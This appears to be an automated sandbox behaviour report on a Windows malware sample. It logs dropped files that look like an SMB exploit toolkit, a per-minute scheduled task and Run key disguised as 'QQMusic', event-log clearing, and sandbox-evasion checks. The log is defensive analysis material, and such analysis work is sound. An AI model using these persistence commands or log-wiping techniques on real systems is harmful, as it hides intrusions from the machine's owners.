Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe /F Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\ProgramData\SMB.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;cywkjq.exe&quot;)
Source: C:\Windows\SysWOW64\cmd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;cywkjq.exe&quot;)
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;cywkjq.exe&quot;)
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;cywkjq.exe&quot;)
Source: C:\Windows\SysWOW64\cmd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;cywkjq.exe&quot;)
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;cywkjq.exe&quot;)
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;cywkjq.exe&quot;)
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;cywkjq.exe&quot;)
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;cywkjq.exe&quot;)
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;cywkjq.exe&quot;)
Source: C:\Windows\SysWOW64\cmd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;cywkjq.exe&quot;)
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;cywkjq.exe&quot;)
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;cywkjq.exe&quot;)
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;cywkjq.exe&quot;)
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;cywkjq.exe&quot;)
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;cywkjq.exe&quot;)
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;cywkjq.exe&quot;)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_00416670 CoCreateInstance, 0_2_00416670
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_00405440 GetDiskFreeSpaceExA, 0_2_00405440
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_0041F6E0 GetWindowThreadProcessId,CreateToolhelp32Snapshot,Process32First,wsprintfA,FindCloseChangeNotification,Process32Next,CloseHandle, 0_2_0041F6E0
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6320:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6744:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5760:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6608:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6920:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6392:120:WilError_01
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Mutant created: \Sessions\1\BaseNamedObjects\caiyundf.cn
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6528:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4152:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6440:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1632:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5864:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1528:120:WilError_01
Source: C:\ProgramData\SMB.exe Command line argument: sfxname 37_2_0133C130
Source: C:\ProgramData\SMB.exe Command line argument: sfxstime 37_2_0133C130
Source: C:\ProgramData\SMB.exe Command line argument: STARTDLG 37_2_0133C130
Source: C:\ProgramData\SMB.exe File written: C:\ProgramData\Shellcode.ini Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static file information: File size 9402368 > 1048576
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2b8e00
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x53aa00
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: More than 200 imports for KERNEL32.dll
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: More than 200 imports for USER32.dll
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: SMB.exe, 00000025.00000002.334719426.0000000001350000.00000002.00000001.01000000.00000005.sdmp, SMB.exe, 00000025.00000000.283876071.0000000001350000.00000002.00000001.01000000.00000005.sdmp, SMB.exe, 00000040.00000000.301017387.0000000001350000.00000002.00000001.01000000.00000005.sdmp, SMB.exe, 00000040.00000002.604463756.0000000001350000.00000002.00000001.01000000.00000005.sdmp
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_005FB406 push ecx; ret 0_2_005FB419
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_005FB5F6 push ecx; ret 0_2_005FB609
Source: C:\ProgramData\SMB.exe Code function: 37_2_0133D856 push ecx; ret 37_2_0133D869
Source: C:\ProgramData\SMB.exe Code function: 37_2_0133CDF0 push eax; ret 37_2_0133CE0E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_0041E5E0 LoadLibraryA,GetProcAddress,FreeLibrary,GetProcessHeap,InternalGetTcpTable2,GetProcessHeap,HeapFree,FreeLibrary,htons,inet_ntoa,GetCurrentProcessId,Sleep,lstrcmpiA,lstrcmpiA,wsprintfA,WinExec,Sleep,DeleteFileA,lstrcmpiA,wsprintfA,WinExec,Sleep,DeleteFileA,GetProcessHeap,HeapFree,FreeLibrary, 0_2_0041E5E0
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: section name: .giats
Source: spread.txt.0.dr Static PE information: section name: .giats
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\__tmp_rar_sfx_access_check_6810734 Jump to behavior
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\etchCore-0.x64.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\cnli-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\riar-2.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\svchostlong.exe Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\pcreposix-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\eteb-2.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\etebCore-2.x86.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\adfw.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\tibe.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\libcurl.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\libeay32.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\svchostromance.exe Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe File created: C:\ProgramData\cywkjq.exe Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\tibe-1.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\ssleay32.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\etch-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe File created: C:\ProgramData\spread.txt Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\tibe-2.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\cnli-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe File created: C:\ProgramData\SMB.exe Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\X86.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\exma-1.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\trch-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\crli-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\posh.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\pcrecpp-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\pcla-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\tucl-1.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\coli-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\tucl.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\X64.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\trfo-2.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\etchCore-0.x86.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\etebCore-2.x64.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\trfo-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\trch-1.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\dmgd-1.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\posh-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\libiconv-2.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\pcre-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\trfo.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\zibe.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\adfw-2.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\riar.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\serverlong.exe Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\xdvl-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\trch.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\zlib1.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\esco-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\ucl.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\iconv.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\libxml2.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\exma.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\dmgd-4.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe File created: C:\ProgramData\spread.txt Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\etchCore-0.x64.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\cnli-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\riar-2.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\svchostlong.exe Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\pcreposix-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\eteb-2.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\etebCore-2.x86.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\adfw.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\tibe.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\libcurl.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\libeay32.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\svchostromance.exe Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe File created: C:\ProgramData\cywkjq.exe Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\tibe-1.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\ssleay32.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\etch-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe File created: C:\ProgramData\spread.txt Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\tibe-2.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\cnli-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe File created: C:\ProgramData\SMB.exe Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\X86.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\exma-1.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\trch-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\crli-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\posh.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\pcrecpp-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\pcla-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\tucl-1.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\coli-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\tucl.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\X64.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\trfo-2.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\etchCore-0.x86.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\etebCore-2.x64.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\trfo-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\trch-1.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\dmgd-1.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\posh-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\libiconv-2.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\pcre-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\trfo.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\zibe.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\adfw-2.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\riar.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\serverlong.exe Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\xdvl-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\trch.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\zlib1.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\esco-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\ucl.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\iconv.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\libxml2.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\exma.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe File created: C:\ProgramData\dmgd-4.dll Jump to dropped file

Boot Survival

barindex
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe /F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run QQMusic Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run QQMusic Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_00421E00 OpenEventLogA,ClearEventLogA,CloseEventLog,DeleteFileA,RegOpenKeyExA,RegDeleteKeyA,RegDeleteKeyA,RegCloseKey,TerminateProcess,FindCloseChangeNotification,wsprintfA,WinExec,Sleep, 0_2_00421E00

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Stalling execution: Execution stalls by calling Sleep
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe, spread.txt.0.dr Binary or memory string: DIR_WATCH.DLL
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe, spread.txt.0.dr Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe TID: 5560 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe TID: 240 Thread sleep count: 34 > 30 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe TID: 244 Thread sleep count: 56 > 30 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe TID: 244 Thread sleep time: -560000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe TID: 4264 Thread sleep time: -324000000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe TID: 4812 Thread sleep count: 34 > 30 Jump to behavior
